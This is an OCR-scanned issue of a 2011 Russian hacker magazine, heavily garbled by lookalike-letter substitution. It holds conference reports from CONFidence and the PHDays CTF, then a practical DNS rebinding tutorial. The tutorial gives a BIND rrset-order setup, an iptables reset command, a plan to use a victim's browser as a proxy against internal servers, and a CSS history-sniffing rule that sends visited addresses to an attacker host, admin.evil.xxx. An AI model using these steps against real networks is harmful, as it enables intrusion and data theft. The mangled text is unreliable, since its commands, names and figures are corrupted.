Оееайпа хб4: Те Еуоийоп о Пе ТОЕ Косой 

Докладчики: Александр Матросов, Евгений Родионов 

Александр и Евгений рассказали про особенности работы ТОЕ в х64 
системе (ага, ведь надо обойти проверку подписи и Ра*сВбчага), про 
заражение МВК и что самое интересное — про то, как обходится 


проверка ОС на наличие подписи у драйвера руткита! В качестве 
жертвы, которую препарировали, использовался нашумевший рут- 
кит ГОЁ4, ставший первым широко распространенным руткитом, 
которому удалось побороть проверку цифровой подписи. Это дей- 
ствительно прикольно и интересно. Особенно порадовали «живые» 
демо-отладки ТОЁ в моменты заражения. 


Ш 0№5 для зла 

О№ юг ем 

Докладчики: Алексей Синцов 

Я представил доклад «ОМ5 Гог ем», в котором поведал о нестан- 
дартном использовании О№$-запросов в качестве протокола для 
взаимодействия троянской программы и С&С. Подробнее оста- 
навливаться не буду, потому что весь материал был в недавних 
статьях [|]. 


Ш Выбираемся из песочниц Мсгозой \\/Ип4о\м/$ 


Езсарта Его М!сго$ой \МЛпао\м/$ 5апабохез$ 
Докладчики: Том Китч 
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На вторые сутки участник соревнований по [оскрсКто`у все-таки снял наручники. Об этом объявили по громкой связи 


Том — веселый парень из Уептопе, сделал очень познавательный 
доклад на тему песочниц. Он рассказал о типах существующих 
песочниц (штука, которая не дает шеллкоду в захваченном про- 
цессе делать то, что хочется — создавать файлы, открывать 
соединения, выполнять команды и т.д.], как они работают, где 
они применяются, и как из них можно убежать. Главная задача в 
таком контексте — это сделать потенциальный эксплоит макси- 
мально дорогим. То есть, если у нас обычное ПО, то написание 
эксплоита, в случае нахождения уязвимости, сводится к реализа- 
ции триггера уязвимости, обхода [ОЕР и АЗЁЕК. Если есть песоч- 
ница, то этого недостаточно, нужно либо эксплуатировать еще 
одну уязвимость в ядре ОС [цена эксплоита растет вдвое, так как 
нужна еще одна бага и еще один эксплоит] или пытаться обойти 
песочницу. И тут все уже зависит от крутизны этой самой песоч- 
ницы. В конце он привел сводную таблицу продуктов и их типы 
песочниц. Круче всех оказалась песочница в бооце Свготе, так 
как использует все доступные модели для ограничения доступа в 
процессе, дальше идет Асгора{ Кеадег, затем На$й, и замыкает 
Рго{есНоп Моде в |ЕЗ :]. Собственно тема очень интересная и 
познавательная, так может быть стоит ждать об этом статью в || 

? Сам Том очень общительный и интересный человек, с которым 
приятно было держать разговор! 


Ш Практические атаки на микросхему МС13224 

РгасНса! аНаск$ оп Ме Неезсае МС13224 Д19Вее 5оР 

Докладчики: Трэвис Гуудспид 

Любители рубрики «Фрикинг», этот доклад специально для вас! 
Трэвис Гуудспид — известный хакер «железок», его доклад собрал 
полный зал и фактически завершал конференцию! Было интерес- 
но послушать об аппаратных методах взлома микроконтроллеров. 
Существует такая микросхема — МС13224, которая используется 
для организации беспроводной связи в промышленных системах, 
устройствах и т.д. (например, этот чип использовался в ниндзя- 
бейджах для ОеЮКоп 18}. Микросхема МС13224 включает в себя 
32?-разрядный микроконтроллер с архитектурой АКМУ7, флеш- 
память, трансивер 802.15.4 и многое другое. Так вот, Грэвис сказал 
— вот захотим мы атаковать такое устройство с этой микросхемой 


ш Почему СОМАФепсе? 


Мероприятие сильно отличается от многих других тем, что оно 
сильно ушло вперед по числу докладов от русскоязычных ис- 
следователей среди остальных международных конференций. И 
причина здесь кроется не только втерриториальном расположе- 
нии (Восточная Европа), но и в атмосфере самой конференции 

и отношении организаторов. Последние хорошо понимают, что 
исследователи с некоммерческими докладами (а других на кон- 
ференции замечено и не было] зачастую не могут позволить себе 
оплатить перелет и проживание. Хорошо, когда родная компания 
может взять издержки на себя, но в нашей странетакое случается 
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по радиоканалу: найти багу, написать эксплоит — то что нам для 
этого надо в первую очередь? А надо нам получить код прошивки! 
Но вот как это сделать, если УТАб-интерфейс заблокирован? 06 
этом и был доклад. Для начала нам понадобится азотная кислота, 
ну или серная... Да! Именно так начинается этот «хак»... 

В слайдах ты много инфы не найдешь. В основном схемы и картин- 
ки, поэтому вот тебе текст — БИ.(у/кЕ5НУ. Кстати, одним из этапов 
взлома был анализ с использованием достаточно дорого обору- 
дования, которого у автора доклада не было. Зато оно оказалось у 
его друзей в близлежащей лаборатории колледжа. В общем, ящик 
пива решил проблему доступа к этому оборудованию :]. От себя 
отмечу: интересно было бы аналогичным методом поломать еТоке- 
ны или РуТокены... 


Ошто 


Конечно, про многие доклады я не рассказал, хотя были и еще 
очень интересные темы, например, про фреймворк Вее[. В любом 
случае все [почти все] материалы доступны на 2011.сопНдепсе. 
ога.рИпла{ета(5 (и на нашем диске — прим. редактора). Жаль, 

что наших соотечественников практически нет на таких конфе- 
ренциях, ведь понятие «повышение квалификации» включает 

в себя поездки на такие мероприятия. Мы всячески призываем 
всех участвовать не только в СОМ @епсе, но и в других междуна- 
родных конференциях. А то у большинства людей складывается 
впечатление, что в нашей стране живут одни киберпреступники в 
медвежьих шкурах. Предлагаем всем помочь изменить этот сло- 
жившийся стереотип. Радует хотя бы то, что наши ребята уже идут 
по верному пути. Так, например, прошедший тоже в мае форум РНО 
является, фактически, первым подобным мероприятием в России 
такого формата: с хакерской атмосферой, реальными техническими 
докладами и соревнованиями [до этого только СВао$ Соп{гисНоп$ 
радовал умы). То ли еще будет. В этом же месяце в России откры- 
лась первая официальная группа ОеЮоп (в Санкт-Петербурге), где 
каждый может рассказать про свой опыт и послушать других, а 
также помочь в создании открытой международной конфы по ИБ на 
территории нашей родины. Так что все будет отлично! 52 


по-прежнему нетак часто. Поэтому отдельно хочется рассказать 
о подходе организаторов к этим вопросам. Так, если твой доклад 
принят, то тебе оплачивают билет на самолет, проживание в отеле 
и даже такси из аэропорта и обратно. Ежедневно организовывают 
специальные ужины для докладчиков, которые проходят в разных 
интересных ресторанах города. Короче говоря, докладчиков здесь 
любят. Имей в виду, что в ближайшее время должен быть запущен 
прием тезисов на осеннее мероприятие СОМЕ!депсе. Если в мае 
эта конференция традиционно проходит в Кракове, то в сентябре 
фигурирует, как правило, какой-нибудь еще из примечательных 
городов Восточный Европы. 
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Позитивный 


э 19 мая в клубе «Молодая гвардия» в рамках форума по 
информационной безопасности Розе НасК Дауз, организованного 
компанией Роз\уе Тесппо(од!е$, прошли международные 
соревнования хакеров СТЕ. 10 команд из России, США, Индиии 
Франции 8 часов подряд демонстрировали мастерство в сетевых 
атаках и защите собственных сервисов. 


Антураж 


Светящийся пол зала, в котором проходили состязания, зловеще 
озарял их напряженные лица. Провода опутывали столы, соз- 
давая ощущение непреодолимой ловушки. Табло сотрясалось. 
Организаторы сделали все, чтобы участники чувствовали себя как 
на кибернетической войне. 

Подобные интеллектуальные соревнования, в которых оценивает- 
ся умение атаковать и защищать компьютерные системы, весьма 
популярны во всем мире. В последние несколько лет они стали 
проводиться и в России. РозШме Наск Пауз СТЕ один из самых 
масштабных у нас в стране, кроме того, содержит в себе ряд совер- 
шенно уникальных элементов. 

Организаторы предложили необычный формат соревнований, 
объединив классический СТЕ и Наские=. Условия игры соче- 
тают в себе м/пКерох (участники имеют полный доступ к системе] 
и ШаскБох-сервисы [нет изначальной информации о системе). 
Состязания были очень напряженными и динамичными. Заданий 
было, пожалуй, слишком много для отведенного времени, поэто- 
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му участникам буквально некогда было утереть пот со лба или 
отвлечься на еду. Задания охватывали все направления ИБ — 
реверсинг, безопасность веб-приложений, безопасность опера- 
ционных систем, безопасность прикладных сервисов и т.п., а для 
любителей классических СТЕ были также предложены задания из 
разряда «угадайка», поэтому каждый участник мог проявить себя 
и получить удовольствие от «разнообразия вкусов». 


Суть соревнования 


Суть игры заключалась в том, что каждая из команд получила 

в свое распоряжение компьютерную систему, инфраструктуру 

из виртуальных серверов, в которой было оставлено несколько 
уязвимостей и набор «флагов» — уникальных идентификаторов. 
Роль флага исполняла особая строчка программного кода. Задача 
участников — защищать свою систему от других команд, устраняя 
уязвимости, атаковать их системы и захватывать флаги. Сложность 
соревнованию также придавало то, что сервисы регулярно изме- 
няли свое состояние и вместе с этим появлялись новые уязвимо- 
сти, а старые исчезали. 


ХАКЕР 08/151/ 2011 


Успешной считалась атака, которая при- 
водит к получению на атакуемой системе 
заветного ключа. За такую атаку, завер- 
шенную регистрацией найденного во вра- 
жеской системе флага, команда получала 
конкурсные очки, а их соперники, прошля- 
пившие штурм, штрафовались. При этом 
нельзя было выполнять любые деструктив- 
ные действия, как против соперников, так 
и против системы конкурса. Все действия 
участников фиксировались системой и 
выводились на конкурсные табло. 

Все заложенные уязвимости были не 
вымышлены, как в большинстве дру- 

гих СТЕ, а взяты из реальной жизни. 
Например, в качестве конкурсного ПО 
организаторы разработали прототип 
системы класса 5САПА [систем, с помо- 
щью которых обычно управляются различ- 
ные промышленные объекты). 

Еще одна изюминка соревнований заклю- 
чалось в том, что они сопровождались кра- 
сивой легендой, все задания были встрое- 
ны в одну сюжетную линию, а при смене 
заданий показывались соответствующие 
видеоклипы. 


Согласно легенде, международная кос- 
мическая экспедиция обнаружила в 
окрестностях Юпитера таинственный моно- 
лит, имеющий форму параллелепипеда. 
Находку назвали РНО [РагаЦе\ер!реа Набце 
ОеесНуе]. Когда монолит попытались 
исследовать, его копии непостижимым 
образом появились во всех ведущих 
странах мира. Исследователи, профессор 
Анисимис и доктор Павлов, изучили явле- 
ние и пришли к выводу, что РНО является 
огромным распределительным транс- 
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форматором, аккумулирующим энергию 
космического излучения и передающим ее 
своим земным копиям. В результате разви- 
тия копии монолита могут покрыть потреб- 
ности человечества в энергоресурсах на 
сотни лет вперед. Кроме этого, проекции 
могут обмениваться информацией через 
интернет. Еще одной экстраординарной 
особенностью является то, что монолиты 
блокируют весь мировой военный потенци- 
ал. И вот, каждая страна собирает элитную 
команду хакеров для разрушения моноли- 
тов вражеских государств с помощью сете- 
вых атак и защиты собственных... 


Итоги конкурса 


Больше всех конкурсных очков получила 
команда из университета Карнеги-Мелона 
в Питсбурге [США) Р!а!а РагИапепЕ о! 
Руигпипд [РРР] и забрала призовые 5 тысяч 
долларов. Второе место заняла команда 

[ ееё Моге из Санкт-Петербургского госу- 
дарственного университета информацион- 
ных технологий, механики и оптики [приз — 
3 тысячи долларов). Третьей стала команда 
екатеринбуржцев НаскегО/от из Уральского 
государственного университета, забрав 2 
тысячи долларов. 

По мнению ведущего СТЕ Дмитрия Евтеева, 
команда из США заняла первое место с 
большим отрывом по следующим причи- 
нам: 

® Они в большей степени были сконцентри- 
рованы на инфраструктуре СТЕ, и это наи- 
более правильная стратегия. В следующем 
году на РНОАУ$ СТЕ 2012 условия немного 
поменяется, и единственно верного под- 
хода уже не будет. Организаторы предложат 


несколько равнозначных по очкам страте- 
ГИЙ. 

® При нахождении уязвимостей, в отличие 
от своих конкурентов, РРР автоматизирова- 
ла эксплоит для массового сбора ключей с 
инфраструктур команд соперников. 

® Команда РРР хорошо и вовремя защища- 
ла свои сервисы, поэтому потеряла очень 
мало очков при нападениях соперников. 

® Студенты из США внимательно сле- 

дили за доступностью своих сервисов, 

тем самым получили минимальное число 
штрафных баллов. 

® Американцы ранее много участвовали в 
соревнованиях типа СТЕ. «Это не первый 
наш опыт участия в соревнованиях СТЕ, 

но на РНО СТЕ нам впервые пришлось не 
только взламывать чужие ресурсы, но и 
защищать собственные. Мы с удовольстви- 
ем примем участие в следующем году», — 
рассказывает один из членов команды. 
Участники команды РРР приехали в 
Россию впервые и, кроме посещения 
РНОау$, успели погулять по центру 
Москвы и Измайловскому парку и взгля- 
нуть на главное здание МТУ. Русские 

СТЕ удивили их своей необычностью: 

«Мы были поражены, когда попали в то 
место, где проводились СТЕ. Мало того, 
что это был ночной клуб, а не стандарт- 
ный конференц-зал, но все, что там было, 
выглядело захватывающе. Соревнования 
были отлично организованы. У нас было 
не только уйма задач, но еще перед каж- 
дым новым обновлением организаторы 
показывали пугающие видеоклипы, а сами 
обновления передавались нам в конвертах 
с пометкой «Совершенно секретно». 
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Сергей Гордейчик, технический директор 
Роз\щуе Тесппоод!е$ 


Мысль витала в воздухе уже давно, 
причем не только в наших голо- 
вах. В последнее время появилось 
множество инициатив по измене- 
нию форматов мероприятий, наши 
коллеги пытаются сделать что-то 
необычное. Осенью прошлого года 
мы поняли, что на рынке чего-то 
не хватает, не хватает тривиальных 
вещей, которые были бы инте- 
ресны нам и людям, с которыми 
мы общаемся. Что это за вещи, 

мы особо не понимали и оконча- 
тельно их список сформировался, 
наверно, на корпоративной вечеринке по случаю НГ, где у нас, в 


7. 


Е? 


основном, и приходят в голову все светлые идеи. В прошлом году 
именно на такой вечеринке мы придумали Ки$Сгур{о СТЕ. В этом 
году сформировалась идея Роз\ме Наск ПШау$ как консолидация 
всех активностей, которые мы до этого делали в рамках Рускрипто, 
|по5есигКуМозсом/, СПаоз$ Соп{гисНоп$, Инфобез и других меро- 
приятий. 


Мы недавно размышляли о развитии Роз ме Наск Пауз. Думали, 
как его можно сделать с меньшим ущербом для компании, чтобы 
это было спокойно, планомерно и размеренно. И мы поняли, что 
если мы хотим делать мероприятие интересным и запоминающим- 
ся, то оно должно делаться на пределе возможностей. В этом году 
было, конечно, очень сложно, потому что от идеи и концепции бук- 
вально за 4 месяца нам нужно было довести мероприятие до его 
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рабочего состояния. В последнее время большинство вовлеченных 
в организацию сотрудников спали по несколько часов в день, а 
некоторые не спали и совсем. Результат нас удовлетворяет на 70%, 
и это хорошо. Оставшиеся 30% — то, что не успели или не сдела- 
ли так, как хотели. С другой стороны, судя по обратной связи, по 
отзывам, то, что было сделано, превзошло ожидания, и это велико- 
лепно. 


Если делать из РозЦме Наск Вау повторяющееся мероприятие, 
этакий медиапродукт, то можно ничего нового не делать. Но это 
будет неинтересно ни нам, ни участникам. Одна из огромных 
составляющих РНО, помимо социальной важности, продвижения и 
обмена информацией, — это удовольствие, которое мы получаем, 
делая такую, я считаю, грандиозную вещь. Поэтому, чтобы его было 
много, надо делать гораздо больше. Что конкретно будет измене- 
но, я не буду заранее говорить. Могу только сказать, что СТЕ будет 
просто грандиозный! Будут объединены в единое игровое про- 
странство зона СТЕ, площадка РНО, интернет... Активности в рам- 
ках СТЕ будут дополнять друг друга, мы полностью переработаем 
визуализацию, пригласим больше команд. 


Всех! Что касается иностранцев, то уже сейчас Дмитрию Евтееву 
поступают заявки от тех команд, до которых мы не могли досту- 
чаться в этом году, есть ребята из Японии, Кореи, которым все это 
интересно, и они готовы приехать. Также мы будем приглашать 
много российских команд, в том числе начинающие команды, пото- 
му что для них это прекрасная возможность проверить свои силы в 
соревнованиях мирового уровня. 


В этом году СТЕ показал, что кроме первого все призовые места за 
нами. РРР в каком-то смысле повезло, но я уверен, наши ребята 
смогут вырваться вперед без проблем. Но, конечно, нужно много 
практики. 
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У нас нет желания делать «русский 
ВаскНа{» или «ОеГсоп», потому что эти 
мероприятия — это продукты, устоявшиеся 
в своей канве. У России есть специфика, 
которая требует совершенно других под- 
ХОЛОВ. 


Большая проблема РНО, которую уже отме- 
чали, это бедность нашего сообщества. В 
качестве примера могу привести тот же 
конкурс «Ноутбук — взломай и уноси». Нам 
пришлось обратиться ко всему сообществу, 
подключить личные связи, изучить спе- 
циализированные сайты, чтобы найти двух 
участников, из которых в результате при- 
шел только один. Конечно, есть слухи, что 
в России много хакеров, но они, видимо, 
где-то спрятались. Тоже касается и конфе- 
ренции. К сожалению, качественного прак- 
тического материала в России сейчас мало. 


У нас не было задачи заработать на РНО. 
Это облегчает многое, позволяет экспери- 
ментировать. И это не могло не отразиться 
и на спонсорской политике. Мы приглашали 
компании, которые могут помочь не только 
деньгами, но и внести в РНО вклад свои- 
ми идеями. Так, Лаборатория Касперского 
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приняла активное участие в подготовке 
деловой программы, С1$со очень помогла 
с аппаратным обеспечением, Кабест помог 
сформировать бизнес-сообщество среди 
участников. Огромное им за это спасибо. 


Нужно проводить больше Роме Наск 
Пауз! Чтобы люди выходили на свет, не боя- 
лись. Одна из задач РНО — показать, что 
хакер — тоже человек, что не стоит отно- 
ситься к поиску уязвимостей, к исследова- 
нию защищенности как к какой-то страш- 
ной и опасной вещи. Это вполне понятная 
легитимная работа (ну иногда, может быть, 
нелегитимная, все зависит от того, куда 
направить ее результаты). Главное, это вещь 
нужная и востребованная, что показал и 
интерес представителей бизнеса к тому, что 
происходило на мероприятии. Важно, что 
есть ребята, которые готовы развиваться в 
этом направлении. Это главный результат 
РНО, помимо удовольствия. 


Непосредственно к нам в компанию после 
РозЦме Наск ПВау$ устроилось 4 челове- 
ка. Другие вендоры, насколько я знаю, 
тоже вели активную кадровую политику на 
форуме. Есть интерес к некоторым СТЕ- 
командам со стороны Ег{егргзе-компаний, 


которые пытаются с ними работать, постро- 
ить взаимоотношения в области исследо- 
вательских программ. Это важная вещь, 
потому что у нас, в отличие от всего мира, 
использование университетских команд, 
университетских лабораторий в реальном 
К&0 в области компьютерной безопасности 
практически нулевое. Здесь же, если эта 
тенденция получит развитие, то мы полу- 
чим то, о чем так долго говорят с высоких 
трибун, — связь производства с высшим 
образованием. Правда, смогут ли вузы 
построить Кезеагсй & Шеуеортеп{у себя, 
предоставлять законченный цикл услуг от 
исследования до компонентов продукта, — 
большой вопрос. 

В любом случае, это важная и полезная 
вещь, которой стоит заниматься. 


Недавно я общался с человеком, который 
«не в теме», и наткнулся на Роме Наск 
Пауз в интернете. Так вот, он воспринял 

это название не как связанное с Ро5 {ме 
Тесппо(од!е$, а как попытку восстановить 
какой-то позитивный имидж хакеров, пози- 
тивное отношение к этому слову, которое 
сейчас носит сугубо негативный оттенок. Мы 
же хотим показать, что хакеры это не столь- 
ко Бивис и Батхед или таинственные кибер- 
преступники, но и эксперты, мастера своего 
дела и любознательные ребята, которые 
хотят развиваться, хотят заниматься чем-то 
полезным, перспективным и нужным. == 
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Ш м Денис Баранов 


По материалам 
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О№ КЕВМОМЬ 


Реализации атаки для обхода зате ото ройсу 


® Основой модели безопасности, заложенной в современные 
браузеры, является механизм «Зате огдт ро(су». Суть его 
заключается в том, что браузеры не позволяют сценариям обращаться 
к данным, расположенным на сторонних доменах. Исключение 
составляет лишь возможности передавать Р05Т-запросы и подключать 
к странице файлы ]ауазсир{ и с$$. При этом не существует никаких 


легальных способов читать данные, 


Обход ограничений 


Подумаем, чего конкретно можно было бы добиться, если бы огра- 
ничение на получение данных с других доменов удалось отменить. В 
первую очередь, мы получили бы возможность не только отправлять 
запросы на сторонние ресурсы (как при стандартных С5КЕ-атаках)}, 
но и обрабатывать ответы, полученные от сервера. А значит, боль- 
шая часть механизмов, предназначенных для защиты от СЪКЕ-атак, 
перестала бы работать. Мы могли бы получить доступ к ресурсам, 
расположенным во внутренней сети [недоступной извне}, при этом 
браузер пользователя использовался бы в качестве прокси. Также 
можно было бы получать конфиденциальные данные с ресурсов, на 
которых пользователь проходит аутентификацию при помощи серти- 
фикатов. Хорошим примером подобного веб-приложения для корпо- 
ративной среды является почтовый сервер ОцЦоок \\еЬ Ассезс. 
Именно для обхода ограничения «Зате опат ройсу» и было при- 
думано семейство атак Апи 0М$ рппипд, также известное как ОМ 
ге папа. Атакам типа Апи ОМ№$ ртптд подвержены веб-серверы, 
которые отвечают на НТТР-запросы с произвольным значением 
заголовка Ноз(. В частности, уязвимы все ммеб-сервера АрасВе и 

||5 с конфигурацией по умолчанию. Также уязвимы практически все 
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получаемые с другого домена. 


удаленные сервисы, управляемые по НТТР, но не имеющие меБ- 
интерфейса. Например, уязвимы практически все сервисы, предо- 
ставляющие удаленные АР! с управлением при помощи протоколов 
5ОАР, ХМЕ-КРС и подобных. 


В чем же суть? 


Современные браузеры, при получении странички с какого-либо 
сайта, кешируют результаты ОМ№$5-запроса. Это делается для предот- 
вращения отправки запросов к сторонним серверам посредством 
подмены [Р-адреса. Давай подумаем, что можно сделать для обхода 
этого механизма. Раньше атака [в теории] могла проводиться сле- 
дующим образом: 

1) Жертва обращается к домену, принадлежащему злоумышленнику. 
2} Получает с ОМ5-сервера |Р-адрес, соответствующий доменному 
имени. 

3] Обращается на меБ-сервер [соответствующий полученному [Р) и 
получает с него сценарий ]ауазстру. 

4] Полученный /ауазсг!р{ через некоторое время после загрузки 
инициирует повторный запрос на сервер. 

5) В этот момент атакующий при помощи межсетевого экрана бло- 
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Реогт аНаск 


< 


Динамическое создание поддоменов 


кирует все запросы жертвы к серверу. 
6) Браузер пытается повторно узнать |Р-адрес сервера (послав 
соответствующий ОМ№5-запрос] и на этот раз получает |Р-адрес уяз- 
вимого сервера из локальной сети жертвы. 

Соответственно, если удастся заманить жертву на свой домен 
еу(.ххх, можно заставить браузер пользователя думать, что этому 
имени домена соответствует не |[Р-адрес из внешнего интернета, 

а |Р-адрес из локальной сети. По этому адресу может, к примеру, 
располагаться какой-нибудь важный внутрикорпоративный ресурс. 
Проблема только в том, что этот вариант атаки не работает. 


Реализуем на практике 


Как можно понять из описания атаки, нам потребуется один сервер, 
на котором нужно поднять и настроить \/ЕВ- и ОМ$-сервера, также 
потребуется домен, на который можно будет заманивать жертву. При 
регистрации доменного имени указываем в качестве М№5-серверов 
данные нашего сервера. 

Для успешного проведения атаки на практике нужно сконфигури- 
ровать М№5-сервер так, чтобы он возвращал оба |[Р-адреса одновре- 
менно. Причем |Р-адрес сервера, на котором лежит /ауазсгир\, про- 
водящий атаку, должен возвращаться первым, а |Р-адрес сервера 
жертвы — вторым. В таком случае при обращении к домену браузер 
сначала загрузит атакующий скрипт с нашего сервера, лишь потом, 
когда сервер станет недоступным (в результате блокировки запроса 
межсетевым экраном), — обратится к серверу жертвы. 

Для этой цели вполне подходит сервер В!та 9. Чтобы он возвращал 
|Р-адреса в нужном порядке, его нужно собрать из исходных кодов 
с флагом --епае-Нхед-ггзе. По умолчанию этот флаг не установ- 
лен, и версии, распространяемые в бинарниках, использовать не 
получится. В настройках Бта9 указывается, что следует использо- 
вать фиксированный порядок следования |Р-адресов. Для этого в 
пагтеЧ.соп.орНоп$, в параметре орйоп5 указывается: 

ггзе{-огедг { огдег Яхес: }: 

Далее нужно настроить зону. На примере домена Чп$.е\м(.ххх: 


п$ А 97.246.251.95 
А 192. 168.91 


В итоге, при обращении к ОМ№$-серверу атакующего, для доме- 
на Чп$.аЦаскегги браузер всегда будет обращаться сначала к 
|Р-адресу 97.246.251.93, затем, если он недоступен, к 192.168.0.1. 
В некоторых случаях этот порядок может нарушаться, подробнее 
описано ниже. 
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Результат атаки на ОЧТоок \\еБ ДАссе$$ 


Помимо сервера ОМ№$ для проведения атаки потребуется веб- 
сервер (в качестве примера рассмотрим АрасВе}, и удобный меха- 
низм блокирования входящих запросов на соединение с сервером. 
Для блокировки входящих запросов можно использовать межсете- 
вой экран гр{аб(е$, и наиболее эффективным способом блокировки 
является отправка пакета с {ср-гезе{ в ответ на попытку соедине- 
ния, иначе браузер будет тратить лишнее время в рамках таймаута 
ТСР-сессии на ожидание ответа от сервера. При помощи 'р{аез 
это делается следующим образом: 


1рфаб1е$ -А ТМРОТ -$ [блокируемый ТР-адрес] -р %ср \ 
- -арогт 80 -] ВЕЗЕСТ --ге]ес*-мтеП Еср-гезе* 


В примере сознательно блокируется только 80-й порт, так как для 
реализации атаки понадобится сервис, на который будут отправ- 
ляться полученные от клиента данные. В итоге атака выглядит сле- 
дующим образом: 

1) Жертва обращается к домену Чпз.е\Ц.ххх. 

2) О№5-сервер атакующего возвращает оба |Р-адреса в фиксиро- 
ванном порядке. 

3] Браузер перенаправляет запрос к серверу, расположенному на 
внешнем |Р 97.246.251.93. 

4] Сервер возвращает НТМ! -страничку с Лауа5спрГом. 

5) После загрузки странички в браузере, клиентский |ауазспр* шлет 
запрос к домену Чпз.е\Ц.ххх. 

6) После получения запроса серверный скрипт блокирует входящие 
соединения с [Р-адреса жертвы. 

7) Через некоторое время клиентский скрипт снова обращается к 
домену Чп5.аЦаскегги и, поскольку сервер 97.246.251.93 возвраща- 
ет К$Г, запрос перенаправляется на локальный сервер 192.168.0.1. 
Теперь наш ауазсгр* может слать любые СЕТ/РОЗТ/НЕАО-запросы 
к приложению, расположенному на адресе 97.246.251.93, а также 
обрабатывать полученные ответы и отправлять результаты атакую- 


щему! 


Полезная нагрузка 


Итак, браузер думает, что скрипт был загружен с ресурса из вну- 
тренней сети, и у нас есть возможность этим ресурсом управ- 

лять. Какие задачи этот скрипт должен выполнить для получения 
практической пользы? Во-первых, скрипт должен определить, с 
каким конкретно приложением мы имеем дело, затем — есть ли 
какая-нибудь авторизация, которую придется обходить. После этого 
скрипт должен выполнить команды, заложенные в нем для данного 
типа оборудования. К примеру, изменить конфигурацию или полу- 
чить копию писем/документов, хранящихся на уязвимом сервере. 
После выполнения жестко заданных команд, можно переключить 
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Процесс авторизации в приложении ОМА 


браузер жертвы в режим прокси-сервера и дать возможность ата- 
кующему слать запросы к приложению в режиме опИпе. 

До выполнения всех этих задач нужно разобраться с тем, как 
скрипт будет отправлять запросы к уязвимому приложению, и как 
будет происходить передача полученных данных на сервер атаку- 
ющего. Не забываем о том, что ограничения 5ате Опт РоЙсу мы 
уже обошли, а значит, для общения скрипта с уязвимым сервером 
можно использовать стандартные А/АХ-технологии, в частности 
компонент ХМЕНЕрКедиее4. 

С передачей полученных данных на сервер сложнее, так как 
сервер управления процессом атаки (административная панель 
атакующего] располагается либо на другом домене, либо на 
другом порту (80-й порт на своем сервере мы заблокировали). 
Это значит, что скрипт снова столкнется с ограничениями $ате 
Онат Ройсу. К счастью, для решения этой проблемы была при- 
думана технология под названием /)5ОМР, использование которой 
позволит отправлять запросы на наш сервер, если тот будет воз- 
вращать специальным образом подготовленные ответы [подроб- 
нее о /5ОМР можно прочитать на ресурсах, посвященных меБ- 
программированию). С механизмами все ясно, идем дальше. 


Выполнение команд 


При отправке команд на атакуемый сервер следует либо исполь- 
зовать ХМЕНИрКедиез{ в синхронном режиме, либо синхронизи- 
ровать отправку команд вручную и не отправлять последующую 
команду до тех пор, пока не придет ответ на предыдущую. В целях 
повышения быстродействия работы скрипта я рекомендую исполь- 
зовать второй вариант. 

Для использования браузера жертвы в качестве прокси, нужно 
после окончания работы скрипта запустить функцию зе гцегуа(, в 
которую передать код, который будет запрашивать у управляющего 
сервера следующую команду, которую нужно запустить на атакуе- 
мом оборудовании. А результат выполнения команды можно пере- 
давать обратно на сервер. 


Атака на корпоративные сети 


Мы разобрались, что делать, если цель одна. Теперь надо разо- 
браться, как атаковать корпоративные сети целиком. Ну и в пер- 
вую очередь для проведения такой атаки необходимо научиться в 
приемлемое время определять [Р-адреса целей атаки. Во-вторых, 
нужно обеспечить возможность атаки нескольких целей за один 
сеанс работы пользователя. В-третьих, требуется возможность 
совершения распределенных атак на один и тот же сервер с 
нескольких браузеров, расположенных во внутренней сети компа- 
нии. И в-четвертых, необходима возможность отправки запросов 
на различные |Р-адреса при использовании браузера жертвы в 
качестве прокси (выше шла речь об отправке подобных команд 
только на один адрес). 
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Атакуем методом О№5 Кебпатоа | 


Целеуказание 


Для определения целей можно сканировать |Р-адреса сети по диа- 
пазону. Для этого можно пользоваться, к примеру, тегом 1ЕКАМЕ и 
событием оп[оаа. Другой вариант реализации — создавать объект 
|паде и при помощи оп[Гоа4 определять, загрузилось ли изобра- 
жение. Для определения того, что по данному адресу ресурс не был 
обнаружен, можно пользоваться функцией зе Титеоц, которая по 
истечении некоторого времени будет проверять, создался ли объ- 
ект или нет, и если объект не создан — сигнализировать о том, что 
ресурс по данному адресу не найден. 

С использованием этого подхода связано несколько очевидных 
проблем: 

1) Прокси-сервер может возвращать ответ даже при отправке 
запроса на несуществующий 1Р-адрес, и в результате метод оп[оа9 
будет указывать на наличие даже несуществующих адресов. 

2} Потенциально большое количество ложных срабатываний при 
ошибках выбора значения таймаута. 

3] При большом значении таймаута и/или большом диапазоне 
перебираемых адресов подбор может занять значительное время. 
Для решения этих проблем можно воспользоваться другим методом 
определения целей. 


(55 Ногу Наск у 2.0 


Несколько лет назад был предложен интересный способ опре- 
деления веб-адресов, которые посещал пользователь браузера. 
Суть метода заключается в том, что при помощи ]ауазсг!р{ можно 
узнать цвет ссылки, созданной на странице, и для ранее посе- 
щенных ссылок этот цвет отличается. 

Таким образом, сформировав список адресов, можно при помощи 
]ауазспр* создать тег <а> для каждого адреса из списка и сверить 
его цвет с цветом уже посещенной ссылки. Для простоты работы, 
цвета уже посещенных ссылок задаются явно при помощи С55. 
Прошло несколько лет, и эту уязвимость закрыли. Современные 
версии браузеров [даже 1Е8] теперь всегда для ссылок про- 
граммно отдают цвет по умолчанию, даже если ранее ссылка 
была посещена. Впрочем, эту уязвимость все равно можно 
реализовать по-новому. Для этого жестко зададим массив про- 
веряемых ссылок, например: 


уаг 11пК$ = [ 
"Пер. // 192 158. 9. Ш. 
“Пе Ер. 192. 158.18. 
ПЕРА. т. 


| 


Для каждой ссылки в динамически создаваемый тег ЭТУЕЕ добавим 
С$$-правило вида: 


АТА: у151%еа { Баскагоипа : иг1 ( "Ир: //адт1пт.е\у11.ххх:8080/ 
Баскоппес*.рНр?иг1=И р: //192.168.0.1'); } 
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Окошко разс-авторизации 


В итоге, при создании ссылки, которая была посещена, браузер 
попытается загрузить иг(, указанный в адресе, а для непосещен- 
ной ссылки иг! загружаться не будет. Таким образом на сервер 
можно передать информацию о посещенных ссылках, и этому 
виду атаки подвержены все актуальные на сегодня версии брау- 
зеров, в том числе и самые новые. 


Атака нескольких целей 


Для проведения атаки типа О0М5 гебтата требуется произво- 
дить блокировку соединений со стороны пользователя, причем с 
учетом реакции современных браузеров эту блокировку следует 
производить еще во время ТСР ПапазВаке. Если блокировку про- 
водить уже после соединения, браузер не будет использовать 
альтернативный адрес. В частности, 1Е и ЕгеТох возвращают 
ответ 200 ОК с пустым телом ответа, а браузер Орега возвращает 
код ошибки 404 и не пытается соединиться с другим 1Р-адресом. 
Таким образом, параллельная атака нескольких ресурсов одно- 
временно с использованием стандартного подхода невозможна. 
Для проведения атаки на несколько целей, можно выделить 
